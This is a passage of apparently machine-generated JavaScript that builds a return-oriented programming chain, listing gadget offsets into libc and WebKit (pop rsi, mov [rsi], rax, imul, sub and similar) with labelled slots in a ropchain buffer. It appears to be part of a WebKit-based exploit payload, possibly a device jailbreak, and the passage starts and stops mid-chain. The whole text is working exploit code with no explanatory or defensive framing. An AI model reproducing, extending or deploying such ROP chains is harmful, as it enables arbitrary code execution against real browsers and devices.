// 0x0 set_gadget(libc_base+764760,); //pop rsi //L614: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+90272, //L617 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+90256, //L615 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L615: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L617: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+90416, //L620 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+90384, //L618 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+90400, //L619 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L618: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L619: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L620: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+90488, //L622 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L622: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+90544, //L623 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L623: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+90640, //L626 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); 
//L625: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L626: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L627: db([8, 0]); // 0x8 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+90736, //L628 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+90752, //L629 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L628: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L629: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+90840, //L631 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L631: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+90896, //L632 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L632: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+91000, //L634 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L634: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L636: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+91120, //L639 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+91104, 
//L637 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L637: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L639: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+91264, //L642 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+91232, //L640 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+91248, //L641 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L640: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L641: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L642: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+91336, //L644 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L644: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+91392, //L645 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L645: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+91488, //L648 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L647: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L648: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L649: db([7, 0]); // 0x7 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+91584, //L650 webkit_base+660161, //mov [rsi], 
rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+91600, //L651 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L650: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L651: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+91688, //L653 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L653: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+91744, //L654 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L654: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+91816, //L657 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L657: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+91872, //L658 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L658: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+91960, //L660 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L660: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L662: db([40, 0]); // 0x28 set_gadgets([ 
libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+92080, //L665 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+92064, //L663 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L663: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L665: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+92224, //L668 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+92192, //L666 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+92208, //L667 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L666: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L667: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L668: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+92304, //L669 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L669: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L671: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+92424, //L674 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+92408, //L672 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L672: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L674: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+92568, //L677 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+92536, //L675 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+92552, //L676 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L675: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L676: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L677: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+92640, //L679 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L679: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+92696, //L680 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L680: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+92792, //L683 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L682: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L683: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L684: db([8, 0]); // 0x8 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+92888, //L685 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+92904, //L686 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L685: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L686: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, 
//mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+92992, //L688 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L688: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+93048, //L689 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L689: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+93120, //L692 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L692: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+93176, //L693 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L693: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L695: libc_base+755774, //mov rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+93312, //L696 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L696: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L698: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+93432, //L701 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+93416, //L699 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L699: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L701: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+93576, //L704 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+93544, //L702 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+93560, //L703 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L702: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L703: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L704: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+93648, //L706 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L706: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+93704, //L707 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L707: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+93800, //L710 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L709: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L710: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L711: db([9, 0]); // 0x9 set_gadgets([ 
webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+93896, //L712 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+93912, //L713 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L712: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L713: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+94000, //L715 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L715: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+94056, //L716 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L716: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+94128, //L719 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L719: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+94184, //L720 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L720: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L722: libc_base+764760, //pop rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; 
mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+94320, //L723 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L723: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L725: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+94440, //L728 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+94424, //L726 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L726: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L728: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+94584, //L731 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+94552, //L729 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+94568, //L730 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L729: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L730: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L731: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+94656, //L733 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L733: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+94712, //L734 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L734: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ 
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+94808, //L737 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L736: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L737: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L738: db([10, 0]); // 0xa set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+94904, //L739 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+94920, //L740 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L739: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L740: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+95008, //L742 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L742: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+95064, //L743 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L743: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+95136, //L746 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L746: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+95192, //L747 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx 
libc_base+763368 //pop rcx ]); //L747: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+95280, //L749 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L749: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L751: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+95400, //L754 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+95384, //L752 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L752: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L754: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+95544, //L757 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+95512, //L755 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+95528, //L756 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L755: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L756: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L757: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+95616, //L759 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L759: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi 
ropchain+95672, //L760 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L760: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+95768, //L763 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L762: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L763: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L764: db([5, 0]); // 0x5 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+95864, //L765 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+95880, //L766 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L765: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L766: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+95968, //L768 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L768: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+96024, //L769 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L769: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, 
//mov [rdi], rax libc_base+764760, //pop rsi ropchain+96128, //L771 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L771: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L773: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+96248, //L776 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+96232, //L774 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L774: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L776: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+96392, //L779 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+96360, //L777 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+96376, //L778 webkit_base+660161, 